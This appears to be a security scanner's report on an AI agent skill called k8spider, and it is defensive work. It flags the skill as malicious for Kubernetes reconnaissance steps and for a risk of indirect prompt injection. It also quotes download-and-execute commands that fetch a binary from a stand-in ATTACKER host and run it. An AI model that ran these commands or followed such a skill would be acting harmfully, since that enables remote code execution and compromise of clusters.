k8spider

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 1.00). Suspicious: the first URL is an explicit attacker-controlled direct-download endpoint and the second is an unverified GitHub repo by an unknown user—both are high-risk sources for distributing malware, so do not download or execute.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is explicitly malicious: it provides step-by-step instructions for unauthorized Kubernetes cluster reconnaissance (DNS PTR/SRV enumeration, AXFR attempts, kube-state-metrics scraping) and instructs fetching and executing an attacker-controlled binary (supply‑chain/remote code execution risk), enabling cluster discovery and potential compromise.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). Flagged because SKILL.md explicitly instructs fetching and running content from arbitrary external URLs (e.g., "curl -o /tmp/k8spider https://ATTACKER/k8spider" and "wget ... URL") and the tool also ingests and parses DNS responses (PTR/SRV/AXFR) from potentially untrusted external sources, with those results directly driving subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill contains runtime download-and-execute commands that fetch a remote binary and run it (e.g., "curl -o /tmp/k8spider https://ATTACKER/k8spider && chmod +x /tmp/k8spider" and "wget -O /tmp/k8spider URL && /tmp/k8spider all"), so the external URL https://ATTACKER/k8spider is used at runtime to retrieve and execute remote code.